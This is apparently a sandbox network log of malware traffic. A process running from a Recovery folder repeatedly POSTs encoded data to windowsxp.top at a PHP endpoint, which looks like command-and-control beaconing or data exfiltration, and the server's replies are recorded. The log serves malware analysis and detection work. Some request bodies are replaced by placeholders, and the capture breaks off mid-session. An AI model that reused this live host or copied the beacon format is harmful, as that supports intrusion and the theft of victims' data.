                                                                                                                  Oct 27, 2024 19:22:59.649451017 CET1008OUTData Raw: 55 55 58 59 5b 5f 53 53 54 58 57 54 54 55 5b 5d 59 51 5b 5b 52 53 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UUXY[_SSTXWTTU[]YQ[[RSR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$2.35:)"&$\9$ ^%;$U8=;=7 23_/=<Z,/!Y##X(
                                                                                                                  Oct 27, 2024 19:22:59.895333052 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:00.194859028 CET | 775 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:00 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pjbkL2RPZmWrp1WCQse8BWLSPg9BE%2FetSd%2FXVQ2128yNsfyI%2BKnjbEOMJEGHbO130v%2FwDG4UHaV3zSOXlCkDvJDJ4zoTDbU%2BK7hyp0zAETPItJKYeNXRnsryOdddbYzi"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6f7fb17a921-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2086&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=585997&cwnd=127&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  20 | 192.168.2.4 | 49769 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:00.330681086 CET | 345 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:23:00.680715084 CET1012OUTData Raw: 55 51 58 5d 5e 52 53 55 54 58 57 54 54 56 5b 5f 59 5e 5b 59 52 57 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UQX]^RSUTXWTTV[_Y^[YRWRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'&.0Y55_!&4,44$(?;<*?<P#(-=*,6Z.!Y##X(/
                                                                                                                  Oct 27, 2024 19:23:00.956592083 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:01.144697905 CET | 772 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:01 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rfKTBx%2FW83lT0J6VlA7p74wwMHFCjK4tosBiIHsyhxcLkp4A1Sm6pepQ749ErFdtkEs3I4XyLtw%2F3JOnShWFibBoBWH4%2BDAAoXq9lrgc2A2Ro4oKj1qjd07yPnjLKBKP"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6fe9bd6e95a-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1395&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=1059253&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0
                                                                                                                  Oct 27, 2024 19:23:01.439527035 CET | 772 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:01 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rfKTBx%2FW83lT0J6VlA7p74wwMHFCjK4tosBiIHsyhxcLkp4A1Sm6pepQ749ErFdtkEs3I4XyLtw%2F3JOnShWFibBoBWH4%2BDAAoXq9lrgc2A2Ro4oKj1qjd07yPnjLKBKP"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6fe9bd6e95a-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1395&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=1059253&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  21 | 192.168.2.4 | 49770 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:01.443068981 CET | 345 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:23:01.790693045 CET1012OUTData Raw: 50 56 5d 5b 5e 59 53 54 54 58 57 54 54 54 5b 5f 59 51 5b 5a 52 53 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PV][^YSTTXWTTT[_YQ[ZRSR^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'& 9"#& :7$$,8W*Y$ !3^,=/*-!Y##X('
                                                                                                                  Oct 27, 2024 19:23:02.026992083 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:02.222079039 CET | 772 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:02 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fw12nH4WvajxTCWBcNUr91fXPqm23WrBoxigBtvCafGQj4WdiDxT9jMaQ4hRSpSNyAbyfqf%2B%2BFhuEXMXvHeRdcsWyX8Kf3cMpzuzBmOQbMG7RdfvpffohfhxR6z%2FFRAh"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7054a57a912-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1315&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=1140157&cwnd=158&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  22 | 192.168.2.4 | 49781 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:02.570138931 CET | 345 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Oct 27, 2024 19:23:02.914840937 CET | 1716 | OUT | Data Raw: [encoded request body]
Oct 27, 2024 19:23:03.172195911 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:03.473891973 CET | 920 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:03 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7a9it4gP70Ivpp57ofyaSAOZSxqWgEnIpSsLseGNWiwgPIYEkmGf0VKxEbRfYonrHvfHDj4YSjoLFkDMrojUvvyTQ7wJb603lbZ2diaRGKX%2BIpf%2B64W%2FRPsZRtxoOonh"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b70c7c780bcf-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1596&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2061&delivery_rate=908976&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49782 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:02.633383989 CET | 345 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Oct 27, 2024 19:23:02.977435112 CET | 1012 | OUT | Data Raw: [encoded request body]
Oct 27, 2024 19:23:03.228634119 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49788 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:03.612495899 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:23:03.961806059 CET | 1012 | OUT | Data Raw: [encoded request body]
Oct 27, 2024 19:23:04.221579075 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:04.408225060 CET | 781 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:04 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ix59z2gtt9HJBSm6vDTcvvS5gFlEhYdpyLzwVU%2BAWIoC7fvYr%2FWj5%2BfDu8%2B7qX2Zy%2FxypQVQ9cd%2BXOysyrC65KRxjAgYH0L%2BCMizP1u2nJMjSfavuEM8VGwttgteTB%2BC"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b712ef273064-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1561&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=955775&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49794 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:04.526927948 CET | 345 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Oct 27, 2024 19:23:05.031265974 CET | 1012 | OUT | Data Raw: [encoded request body]
Oct 27, 2024 19:23:05.130562067 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:05.459125042 CET | 778 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:05 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JkWg0cN%2F4hpgzvPMTRj%2BAubaDWj1ji4NSGkOKmGyjTkn19LqxSpavtOybRG1BDjpBCS%2B7FIwgy6pp9GPB%2FZHBchHRv6%2BU5FJcf%2FNmRQHEK7vAOIPZXNywlaJRGz9xMHc"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b718ae8de5bd-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1324&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=1135686&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49800 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:05.588754892 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:23:05.946269035 CET | 1012 | OUT | Data Raw: [encoded request body]
Oct 27, 2024 19:23:06.176573992 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:06.480262995 CET | 766 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:06 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LXoPVLPB3pStu5pqfwr9HgQwnutbtUtKgM5k7hvATAqulJx3GwgcwPmE6pXiQ6Bnqb8MI8lUohVHW9riej07JhMsPE5J9R43y19Ilnah2C7thne6Cs8SOKlpupQyfZQf"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b71f39834794-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1385&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1172469&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49806 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:06.610922098 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:23:06.961699009 CET | 1012 | OUT | Data Raw: [encoded request body]
Oct 27, 2024 19:23:07.220874071 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:07.513197899 CET | 770 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:07 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ynYsNtUAcFbNWZqp9Laf298rDs92i2uJPXp3SKl7Hybhq75WzzdGoigR%2BJOfaO%2B084oHNb9NwBQlQXOeBemCWv8pFDvzgRZZrtG7hcdbpRb7ApeoznmbVaTa5fSuLwfU"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b725a8bfe7f7-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1136&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1337026&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49816 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:07.962234020 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:23:08.321492910 CET | 1012 | OUT | Data Raw: [encoded request body]
Oct 27, 2024 19:23:08.576694965 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:08.875416040 CET | 766 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:08 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cJ9R9u9GDiTZGdNditVHNIrvXZLqemU4fB7FKlRM67JuaVtV59rNCKfSNwV9OVdsjBhxHL39oqR3Ko01AA8tLtBqKK7rxEWrFHviq9TWAacRonNR0u0MkRpXdacnEpoV"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b72e390d0c27-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1107&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1341983&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49818 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:08.513313055 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:08.872344971 CET1716OUTData Raw: 55 50 58 55 5e 5a 56 57 54 58 57 54 54 50 5b 5f 59 5a 5b 5e 52 54 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UPXU^ZVWTXWTTP[_YZ[^RTRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'& 9)"%#-B038',>T*/V#!';?Z*,=-?!Y##X(7
Oct 27, 2024 19:23:09.108038902 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:23:09.424334049 CET | 917 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:09 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XuDQ6o8xMRWbXLVgkozGG8%2BegXI9zRiQyuYI7sencsQ7gxk%2BGkbIvwuaiYTeISXweu%2FyWwqAHuejL3aIb7Bfmdmzs8bFNH%2FjsznGu83HcLvHSwDY5PmQRyU7PghWw8ob"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b7318bd8e75a-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1816&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=695485&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 14 22 2e 3c 57 2a 05 21 50 2a 1f 2d 5e 30 02 29 5a 3b 32 0d 07 28 2d 32 0f 3a 2b 2d 0d 27 1d 2a 1b 29 39 24 12 23 3d 30 53 3e 35 21 5e 00 1c 27 17 22 58 31 50 25 05 30 5c 24 23 2c 5c 21 2d 2b 15 3d 00 21 1d 3f 5f 27 06 28 16 0d 52 3b 06 3e 0f 31 17 00 12 2c 06 36 5f 28 10 2a 54 0c 14 21 11 2d 3f 19 07 35 31 21 52 29 1c 20 1e 27 00 2b 0a 27 03 23 0e 3c 2c 0a 01 2b 03 3a 00 21 02 05 04 2b 16 21 07 27 03 3c 05 2b 2e 22 54 22 0e 29 53 0f 30 59 50 0d 0a
                                                                                                                  Data Ascii: 98"".<W*!P*-^0)Z;2(-2:+-'*)9$#=0S>5!^'"X1P%0\$#,\!-+=!?_'(R;>1,6_(*T!-?51!R) '+'#<,+:!+!'<+."T")S0YP
Oct 27, 2024 19:23:09.424350023 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49824 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:23:09.007421970 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
